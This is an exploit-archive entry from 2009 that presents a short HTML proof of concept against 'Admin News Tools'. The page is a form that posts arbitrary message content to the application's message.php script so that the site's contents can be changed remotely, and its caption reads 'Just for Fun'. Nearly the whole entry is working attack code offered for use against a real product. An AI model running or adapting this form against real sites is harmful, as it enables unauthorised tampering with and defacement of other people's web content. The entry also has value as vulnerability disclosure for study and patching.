[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Admin News Tools Remote Contents Change Vulnerability
# Published : 2009-07-15
# Author : Securitylab.ir
# Previous Title : Infinity <= 2.0.5 Arbitrary Create Admin Exploit
# Next Title : WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability
<html>
<!-- Securitylab.ir , info@securitylab.ir -->
<head>
</head>
<body>
<center>
<center>
<p><b><font size="+2">Admin News Tools<i> </i></font><font size="2">Remote
Contents Change Vulnerability</font></b></p>
</center>
<form action="http://site.com/news/system/message.php" method="post">
<div><br>
<textarea cols="89" rows="12" name="message"></textarea>
<p>
<input value="Send"
onclick="this.setAttribute('value','...');"
type="submit"></p>
</div>
<p>Just for Fun
</p>
<p></p>
</form>
</center>
</body>
</html>
# www.Syue.com [2009-07-15]